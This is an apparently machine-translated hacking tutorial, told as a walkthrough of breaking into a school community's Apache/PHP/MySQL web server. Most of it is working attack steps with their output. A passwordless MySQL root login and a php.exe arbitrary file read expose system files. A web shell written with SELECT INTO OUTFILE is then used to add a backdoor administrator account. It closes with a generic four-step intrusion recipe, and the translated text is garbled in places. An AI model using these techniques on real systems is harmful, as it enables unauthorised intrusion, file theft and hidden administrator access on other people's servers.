Mysql
With a superscan sweep.
A Class C network segment, looking for open 80-port machine, the result is only one machine
Open the 80 port, try to connect, is the home of a community in our school.
From the port of banner should be Apache (Win32), confirmed
Telnet 211.87.xxx.xxx
Get (Enter)
<! DOCTYPE HTML PUBLIC "-//ietf//dtd HTML 2.0//en" >
<HTML><HEAD>
<title>501 method
Not implemented</title>
</HEAD><BODY>
Get To/index
. html Not supported.<p>
Invalid method in Request get<p>
<HR>
<address>apache/1.3.2
2 Server at www.xxxxxx.com Port 80</address>
</BODY></HTML>
The connection to the host is lost.
C:\>
Oh, this is a clearer view
As far as I'm guessing, it should be the "apache+mysql+php" gold combination.
Habitual mysql-h 211.87.xxx.xxx.
I'm sure it's connected.
Welcome to the MySQL Monitor. Commands end With or \g.
Your MySQL Connection ID is to server version:3.23.53-max-nt
Type help; or \h for help. Type \c to clear the buffer.
Mysql>
Disconnect the Try
Mysql-h 211.87.xxx.xxx-u Root-p
Password
Welcome to the MySQL Monitor. Commands end With or \g.
Your MySQL Connection ID is-to server version:3.23.53-max-nt
Type help; or \h for help. Type \c to clear the buffer.
Mysql>
Oh, you see his root user does not have a password, this is the first topic I want to say today.
It is quite dangerous to encounter this situation, and there are 99.999% of possible access to
Now that you're using the apache+php, just find the physical path to the web he's hosting locally, and do whatever you want.
Oh
The next question is what I'm going to say today. How do I know the physical path of the web where the host resides?
There are many kinds of methods, here I introduce 2 methods for beginners to refer to
The first thing to tell you is that the lower version of apache+php has a loophole
Tim Http://xxx.xxxx.xxx.xxx/php/php.exe? The physical file name of the other
You can download the physical file.
So Tim Http://211.87.xxx.xxx/php/php.exe?c:\a.txt
Return
No input file specified. (no page is found without this vulnerability)
Well, that means he has this loophole.
In Tim Http://211.87.xxx.xxx/php/php.exe?c:\boot.ini
Return
[boot loader] timeout=30 default=multi (0) disk (0) rdisk (0) partition (1) \ windows [operating
Systems] multi (0) disk (0) rdisk (0) partition (1) \windows= "Microsoft WINDOWS XP Professional"
/fastdetect
Oh, installed or XP.
Okay, we can guess the physical location of the other Apache file.
http://211.87.xxx.xxx/php/php.exe?c:\apache\conf\httpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?d:\apache\conf\httpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?e:\apache\conf\httpd.conf
No input file specified.
Http://211.87.xxx.xxx/php/php.exe?c:\programFiles\apache\conf\httpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?f:\apache\conf\httpd.conf
Guessed it, returned a lot of things
Find what we want.
# Documentroot:the directory out of which your'll serve your
# documents. By default, all requests are taken from this directory, but
# Symbolic links and aliases may is used to the other locations.
#
DocumentRoot "D:\homepage"
I can see that the other side's home directory is D:\homepage.
The following things are good to do, now want shell?
Don't worry, we'll take a look at another way.
That's the mistake of using MySQL.
Take a look at his web page and find a place to use MySQL.
http://211.87.xxx.xxx/skonline/study/list.php?id=14
Too handsome, haha haha
Submit
Http://211.87.xxx.xxx/skonline/study/list.php?id=14
Return
Warning:supplied argument is isn't a valid MySQL result resource in
d:\homepage\skonline\study\list.php on line 231
Oh, at a glance.
And then it's the shell that makes us.
Mysql-h 211.87.xxx.xxx-u Root-p
Password
Welcome to the MySQL Monitor. Commands end With or \g.
Your MySQL Connection ID is-to server version:3.23.53-max-nt
Type help; or \h for help. Type \c to clear the buffer.
mysql> use test;
Database changed
Mysql> CREATE table t (cmd text);
Query OK, 0 rows affected (0.08 sec)
Mysql> INSERT into T values (<?system ($c);? >);
Query OK, 1 row affected (12.52 sec)
Mysql> select * from t into d:\\homepage\\test.php;
My shell is very simple <?system ($c);? ", less than 20 characters, but he has enough
Let me execute arbitrary commands, which is enough to see the power of PHP.
How do you use it?
Submit
http://211.87.xxx.xxx/test.php?c=net User Kid/add
Command completed successfully
http://211.87.xxx.xxx/test.php?c=net localgroup Administrators Kid/add
Command completed successfully
Oh, test success, through!
The rest is that you are free to play.
Thus, it is not difficult to generalize this type of intrusion step:
1, find the 3306 port without the password
2, find each other's web physical path
3, Manufacturing shell
4, follow-up work
Oh, here to remind you, if you want to or are using MySQL
Be sure to set a strong secret for your root.